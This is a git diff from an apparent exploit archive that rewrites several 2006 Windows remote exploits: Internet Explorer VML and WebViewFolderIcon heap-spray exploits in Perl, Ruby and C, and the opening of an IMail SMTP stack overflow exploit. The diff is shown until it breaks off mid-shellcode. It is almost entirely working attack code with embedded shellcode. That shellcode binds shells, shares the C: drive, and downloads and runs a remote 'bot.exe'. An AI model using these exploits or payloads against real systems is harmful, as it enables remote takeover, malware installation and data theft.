-		my $c2 = ord(substr($data, $idx+1, 1));	
-		if ($mode eq 'LE') {
-			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
-		} else {
-			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
-		}
-		$idx += 2;
-	}
-	
-	return $code;
-}
-
-# milw0rm.com [2006-09-25]
+#!/usr/bin/perl
+#
+# Microsoft Internet Explorer VML Remote Buffer Overflow (Windows XP SP2)
+#
+# Author: Trirat Puttaraksa (Kira) 
+#
+# Credits: Niega
+#
+# [UPDATE Sep 24]
+# At the first time, I decide to release this exploit on Oct 10.
+# However, if u see this exploit before Oct 10, it is because of one
+# of the following reason:
+# 	1. M$ release early than Oct 10 (may be impossible, lol)
+# 	2. there is someone already publish the exploit, so there is no means
+# 	   to still keep it private
+# I'm already publish things about XP SP2 in my log :)
+#
+# http://sf-freedom.blogspot.com
+#
+###############################################################################
+# For educational purpose only
+#
+# Note: This exploit is modified from Shirkdog's PoC 
+# (http://www.milw0rm.com/exploits/2400)
+#
+# I exploit the stack-based buffer overflow in the different manner because of 
+# the problem of shellcode. I use heap spraying technique to injection my 
+# shellcode in the heap. Because I can control EIP so I tell it to jump into 
+# the heap that contains shellcode ^-^
+#
+# This exploit tested on: 
+# 			  Windows XP SP2 + IE6 SP1
+# 			  Windows XP SP1 + IE6 SP1 
+# 			  Windows XP SP0 + IE6
+#			  Windows 2000 SP4 + IE6 SP1
+#			  Windows 2000 SP4 + IE6
+#
+# I will describe more implementation details at my blog in this weekend :)
+#
+# P.S. Because of the buffer overflow protection mechanism in Windows XP SP2,
+# This exploit is not success. The situation that overwrite to the location 
+# that eax point to is not occured, so I cannot use my techqniue 
+# "The Fake Cookie" that I use to break buffer overflow protection in 
+# Windows Server 2003 SP0 to bypass it. If anybody can break this protection 
+# with some techniques, plz share information :)
+#
+
+use strict;
+
+# win32_bind LPORT = 5555 - Metasploit
+my $shellcode =
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49".
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d".
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66".
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61".
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40".
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32".
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6".
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09".
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0".
+"\x66\x68\x15\xb3\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff".
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53".
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff".
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64".
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89".
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab".
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51".
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53".
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6".
+"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";
+
+my $jscript =
+"";
+
+my $header =
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+"\n" .
+$jscript .
+"\n" .
+"\n" ;
+
+my $footer =
+"\n" .
+"\n" .
+"";
+
+
+my $body1 = "\n" .
+"\n" .
+"\n" .
+"";
+
+my $page = "\xff\xfe";	# magic number of M$ unicode file
+my $c;
+
+# header + body1 
+foreach $c (split //, ($header . $body1)) {
+	$page = $page . $c . "\x00";
+}
+
+# very simple :)
+$page = $page . "\x0d\x0d\x0d\x0d" x 65535;
+
+# body2 + footer
+foreach $c (split //, ($body2 . $footer)) {
+	$page = $page . $c . "\x00";
+}
+
+open (IE_VML, ">", "exploit.html");
+
+print IE_VML $page;
+
+close IE_VML;
+
+# This function copy from JSUnescape() code in Metasploit
+sub convert_shellcode {
+	my $data = shift;
+	my $mode = shift() || 'LE';
+	my $code = '';
+	
+	# Encode the shellcode via %u sequences for JS's unescape() function
+	my $idx = 0;
+	
+	# Pad to an even number of bytes
+	if (length($data) % 2 != 0) {
+		$data .= substr($data, -1, 1);
+	}
+	
+	while ($idx < length($data) - 1) {
+		my $c1 = ord(substr($data, $idx, 1));
+		my $c2 = ord(substr($data, $idx+1, 1));	
+		if ($mode eq 'LE') {
+			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
+		} else {
+			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
+		}
+		$idx += 2;
+	}
+	
+	return $code;
+}
+
+# milw0rm.com [2006-09-25]
diff --git a/platforms/windows/remote/2440.rb b/platforms/windows/remote/2440.rb
index f75072c54..98932f6f4 100755
--- a/platforms/windows/remote/2440.rb
+++ b/platforms/windows/remote/2440.rb
@@ -1,135 +1,135 @@
-# This module is part of the metasploit framework3 
-# svn co http://metasploit.com/svn/framework3/trunk/
-
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
-
-	include Exploit::Remote::HttpServer::Html
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
-			'Description'    => %q{
-				This module exploits a flaw in the WebViewFolderIcon ActiveX control
-			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
-			during the Month of Browser Bugs project (MoBB #18).
-			},
-			'License'        => MSF_LICENSE,
-			'Author'         => 
-				[ 
-					'hdm', 
-				],
-			'Version'        => '$Revision: 3783 $',
-			'References'     => 
-				[
-					[ 'OSVDB', '27110' ],
-					[ 'BID', '19030' ],
-					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
-				],
-			'Payload'        =>
-				{
-					'Space'          => 1024,
-					'BadChars'       => "\x00",
-	
-				},
-			'Platform'       => 'win',
-			'Targets'        =>
-				[
-					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
-				],
-			'DefaultTarget'  => 0))
-	end
-
-	def autofilter
-		false
-	end
-	
-	def on_request_uri(cli, request)
-
-		# Re-generate the payload
-		return if ((p = regenerate_payload(cli)) == nil)
-
-		# Encode the shellcode
-		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
-		
-		# Get a unicode friendly version of the return address
-		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]
-
-		# Randomize the javascript variable names	
-		var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
-		var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
-		
-		# Randomize HTML data
-		html          = Rex::Text.rand_text_alpha(rand(30)+2)
-		
-		# Build out the message
-		content = %Q|
-
-
-	
-
-
-#{html}
-
-		
-		|
-
-		# Randomize the whitespace in the document
-		content.gsub!(/\s+/) do |s|
-			len = rand(100)+2
-			set = "\x09\x20\x0d\x0a"
-			buf = ''
-			
-			while (buf.length < len)
-				buf << set[rand(set.length)].chr
-			end
-			
-			buf
-		end
-		
-		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
-
-		# Transmit the response to the client
-		send_response(cli, content)
-	end
-
-end
-
-end
-
-# milw0rm.com [2006-09-27]
+# This module is part of the metasploit framework3 
+# svn co http://metasploit.com/svn/framework3/trunk/
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Browser::WebView_SetSlice < Msf::Exploit::Remote
+
+	include Exploit::Remote::HttpServer::Html
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer WebViewFolderIcon setSlice() Overflow',
+			'Description'    => %q{
+				This module exploits a flaw in the WebViewFolderIcon ActiveX control
+			included with Windows 2000, Windows XP, and Windows 2003. This flaw was published
+			during the Month of Browser Bugs project (MoBB #18).
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         => 
+				[ 
+					'hdm', 
+				],
+			'Version'        => '$Revision: 3783 $',
+			'References'     => 
+				[
+					[ 'OSVDB', '27110' ],
+					[ 'BID', '19030' ],
+					[ 'URL', 'http://browserfun.blogspot.com/2006/07/mobb-18-webviewfoldericon-setslice.html' ]
+				],
+			'Payload'        =>
+				{
+					'Space'          => 1024,
+					'BadChars'       => "\x00",
+	
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					['Windows XP SP0-SP2 / IE 6.0SP1 English', {'Ret' => 0x0c0c0c0c} ]
+				],
+			'DefaultTarget'  => 0))
+	end
+
+	def autofilter
+		false
+	end
+	
+	def on_request_uri(cli, request)
+
+		# Re-generate the payload
+		return if ((p = regenerate_payload(cli)) == nil)
+
+		# Encode the shellcode
+		shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
+		
+		# Get a unicode friendly version of the return address
+		addr_word  = [target.ret].pack('V').unpack('H*')[0][0,4]
+
+		# Randomize the javascript variable names	
+		var_buffer    = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_shellcode = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_unescape  = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_x         = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_i         = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_tic       = Rex::Text.rand_text_alpha(rand(30)+2)
+		var_toc       = Rex::Text.rand_text_alpha(rand(30)+2)
+		
+		# Randomize HTML data
+		html          = Rex::Text.rand_text_alpha(rand(30)+2)
+		
+		# Build out the message
+		content = %Q|
+
+
+	
+
+
+#{html}
+
+		
+		|
+
+		# Randomize the whitespace in the document
+		content.gsub!(/\s+/) do |s|
+			len = rand(100)+2
+			set = "\x09\x20\x0d\x0a"
+			buf = ''
+			
+			while (buf.length < len)
+				buf << set[rand(set.length)].chr
+			end
+			
+			buf
+		end
+		
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
+
+		# Transmit the response to the client
+		send_response(cli, content)
+	end
+
+end
+
+end
+
+# milw0rm.com [2006-09-27]
diff --git a/platforms/windows/remote/2448.html b/platforms/windows/remote/2448.html
index b11755cdf..c4e6cabe5 100755
--- a/platforms/windows/remote/2448.html
+++ b/platforms/windows/remote/2448.html
@@ -1,67 +1,67 @@
-
-
-
-
- 
-
-
-
-
-# milw0rm.com [2006-09-28]
+
+
+
+
+ 
+
+
+
+
+# milw0rm.com [2006-09-28]
diff --git a/platforms/windows/remote/2458.pl b/platforms/windows/remote/2458.pl
index e2a917047..b7c517ddc 100755
--- a/platforms/windows/remote/2458.pl
+++ b/platforms/windows/remote/2458.pl
@@ -1,108 +1,108 @@
-#!/usr/bin/perl
-
-#
-# Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC
-#
-# Author: Vampyroteuthis Infernalis 
-# Greetz: H D Moor, Dark Eagle, Jamikazu
-#
-#
-
-
-use strict;
-
-my $sco =
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
-"http://dedicated.com/bot.exe";
-
-my $war_code= convert_sco($sco);
-
-my @exploit_body=<
-
-
-
-
-
-
-FOOKER
-
-open (IE_VML, ">", "exploit.html");
-
-print IE_VML @exploit_body;
-
-close IE_VML;
-
-sub convert_sco {
-	my $data = shift;
-	my $mode = shift() || 'LE';
-	my $code = '';
-	
-	my $idx = 0;
-	
-	if (length($data) % 2 != 0) {
-		$data .= substr($data, -1, 1);
-	}
-	
-	while ($idx < length($data) - 1) {
-		my $c1 = ord(substr($data, $idx, 1));
-		my $c2 = ord(substr($data, $idx+1, 1));	
-		if ($mode eq 'LE') {
-			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
-		} else {
-			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
-		}
-		$idx += 2;
-	}
-	
-	return $code;
-}
-
-# milw0rm.com [2006-09-29]
+#!/usr/bin/perl
+
+#
+# Microsoft Internet Explorer WebViewFolderIcon setSlice() D0wnLoad & Exec POC
+#
+# Author: Vampyroteuthis Infernalis 
+# Greetz: H D Moor, Dark Eagle, Jamikazu
+#
+#
+
+
+use strict;
+
+my $sco =
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03".
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74".
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E".
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03".
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C".
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40".
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C".
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC".
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F".
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB".
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83".
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF".
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF".
+"http://dedicated.com/bot.exe";
+
+my $war_code= convert_sco($sco);
+
+my @exploit_body=<
+
+
+
+
+
+
+FOOKER
+
+open (IE_VML, ">", "exploit.html");
+
+print IE_VML @exploit_body;
+
+close IE_VML;
+
+sub convert_sco {
+	my $data = shift;
+	my $mode = shift() || 'LE';
+	my $code = '';
+	
+	my $idx = 0;
+	
+	if (length($data) % 2 != 0) {
+		$data .= substr($data, -1, 1);
+	}
+	
+	while ($idx < length($data) - 1) {
+		my $c1 = ord(substr($data, $idx, 1));
+		my $c2 = ord(substr($data, $idx+1, 1));	
+		if ($mode eq 'LE') {
+			$code .= sprintf('%%u%.2x%.2x', $c2, $c1);	
+		} else {
+			$code .= sprintf('%%u%.2x%.2x', $c1, $c2);	
+		}
+		$idx += 2;
+	}
+	
+	return $code;
+}
+
+# milw0rm.com [2006-09-29]
diff --git a/platforms/windows/remote/2460.c b/platforms/windows/remote/2460.c
index 82a8486e8..aef4c524d 100755
--- a/platforms/windows/remote/2460.c
+++ b/platforms/windows/remote/2460.c
@@ -1,169 +1,169 @@
-/*
-*-----------------------------------------------------------------------
-*
-* Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
-*	Works on all Windows XP versions including SP2
-*
-*	Author: LukeHack 
-*	Mail: lukehack@fastwebnet.it
-*
-*	Bug discovered by Computer H D Moore (http://www.metasploit.com)
-*
-*	Credit: metasploit, jamikazu, yag kohna(for the shellcode)
-*
-*          :
-* Tested   : 
-*          : Windows XP SP2 + Internet Explorer 6.0 SP1 
-*          :
-* Complie  : cl pociewvf.c
-*          :
-* Usage    : c:\>pociewvf
-*          :
-*          :Usage: pociewvf  [htmlfile]
-*          :
-*          
-*          
-*------------------------------------------------------------------------
-*/
-
-#include 
-#include 
-#include 
-
-FILE *fp = NULL;
-char *file = "lukehack.htm";
-char *url = NULL;
-
-unsigned char sc[] =     
-"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
-"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
-"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
-"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
-"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
-"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
-"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
-"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
-"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
-"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
-"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
-"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
-"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
-
-char * header =
-"\n"
-"\n"
-"\n"
-"\n"
-"\n";
-
-// print unicode shellcode
-void PrintPayLoad(char *lpBuff, int buffsize)
-{
-   int i;
-   for(i=0;i [htmlfile]\r\n\n", argv[0]);
-      exit(1);
-   }
-   
-   url = argv[1];
-   
-
-    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
-    {
-        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
-        return;                
-    }
-
-      printf("[+] download url:%s\n", url);
-      
-      if(argc >=3) file = argv[2];
-      printf("[+] exploit file:%s\n", file);
-       
-   fp = fopen(file, "w");
-   if(!fp)
-   {
-       printf("[-] Open file error!\n");
-          return;
-   }    
-   
-   fprintf(fp, "%s", header);
-   fflush(fp);
-   
-   memset(buf, 0, sizeof(buf));
-   sc_len = sizeof(sc)-1;
-   memcpy(buf, sc, sc_len);
-   memcpy(buf+sc_len, url, strlen(url));
-   
-   sc_len += strlen(url)+1;
-   PrintPayLoad(buf, sc_len);
- 
-   fprintf(fp, "%s", footer);
-   fflush(fp);  
-   
-   printf("[+] exploit write to %s success!\n", file);
-}
-
-// LukeHack coded it!
-
-// milw0rm.com [2006-09-29]
+/*
+*-----------------------------------------------------------------------
+*
+* Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
+*	Works on all Windows XP versions including SP2
+*
+*	Author: LukeHack 
+*	Mail: lukehack@fastwebnet.it
+*
+*	Bug discovered by Computer H D Moore (http://www.metasploit.com)
+*
+*	Credit: metasploit, jamikazu, yag kohna(for the shellcode)
+*
+*          :
+* Tested   : 
+*          : Windows XP SP2 + Internet Explorer 6.0 SP1 
+*          :
+* Complie  : cl pociewvf.c
+*          :
+* Usage    : c:\>pociewvf
+*          :
+*          :Usage: pociewvf  [htmlfile]
+*          :
+*          
+*          
+*------------------------------------------------------------------------
+*/
+
+#include 
+#include 
+#include 
+
+FILE *fp = NULL;
+char *file = "lukehack.htm";
+char *url = NULL;
+
+unsigned char sc[] =     
+"\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"
+"\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"
+"\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"
+"\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"
+"\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"
+"\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"
+"\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"
+"\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"
+"\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"
+"\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"
+"\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"
+"\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"
+"\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF";
+
+char * header =
+"\n"
+"\n"
+"\n"
+"\n"
+"\n";
+
+// print unicode shellcode
+void PrintPayLoad(char *lpBuff, int buffsize)
+{
+   int i;
+   for(i=0;i [htmlfile]\r\n\n", argv[0]);
+      exit(1);
+   }
+   
+   url = argv[1];
+   
+
+    if( (!strstr(url, "http://") &&  !strstr(url, "ftp://")) || strlen(url) < 10)
+    {
+        printf("[-] Invalid url. Must start with 'http://','ftp://'\n");
+        return;                
+    }
+
+      printf("[+] download url:%s\n", url);
+      
+      if(argc >=3) file = argv[2];
+      printf("[+] exploit file:%s\n", file);
+       
+   fp = fopen(file, "w");
+   if(!fp)
+   {
+       printf("[-] Open file error!\n");
+          return;
+   }    
+   
+   fprintf(fp, "%s", header);
+   fflush(fp);
+   
+   memset(buf, 0, sizeof(buf));
+   sc_len = sizeof(sc)-1;
+   memcpy(buf, sc, sc_len);
+   memcpy(buf+sc_len, url, strlen(url));
+   
+   sc_len += strlen(url)+1;
+   PrintPayLoad(buf, sc_len);
+ 
+   fprintf(fp, "%s", footer);
+   fflush(fp);  
+   
+   printf("[+] exploit write to %s success!\n", file);
+}
+
+// LukeHack coded it!
+
+// milw0rm.com [2006-09-29]
diff --git a/platforms/windows/remote/2601.c b/platforms/windows/remote/2601.c
index cec5418a1..71bd4bc5c 100755
--- a/platforms/windows/remote/2601.c
+++ b/platforms/windows/remote/2601.c
@@ -1,402 +1,402 @@
-// IMail 2006 and 8.x SMTP Stack Overflow Exploit
-// coded by Greg Linares [glinares.code[at]gmail[dot]com
-// http://www.juniper.net/security/auto/vulnerabilities/vuln3414.html
-// This works on the following versions:
-// 2006 IMail prior to 2006.1 update
-
-
-#include 
-#include 
-#include 
-#include 
-
-#pragma comment(lib,"wsock32.lib")
-
-int main(int argc, char *argv[])
-{
-static char overflow[1028];
-
-
-
-// PAYLOADS
-// Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
-
-/* win32_exec -  EXITFUNC=seh CMD=net share Export=C:\ /unlimited Size=188 Encoder=ShikataGaNai http://metasploit.com */
-unsigned char RootShare[] =
-"\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
-"\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46"
-"\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69"
-"\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89"
-"\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62"
-"\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34"
-"\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c"
-"\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5"
-"\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac"
-"\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc"
-"\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26"
-"\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";
-
-
-/* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
-unsigned char Win32Bind[] =
-"\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93"
-"\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9"
-"\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd"
-"\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf"
-"\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e"
-"\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd"
-"\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd"
-"\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66"
-"\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6"
-"\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34"
-"\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65"
-"\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7"
-"\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e"
-"\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f"
-"\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61"
-"\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66"
-"\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b"
-"\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9"
-"\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67"
-"\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6"
-"\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69"
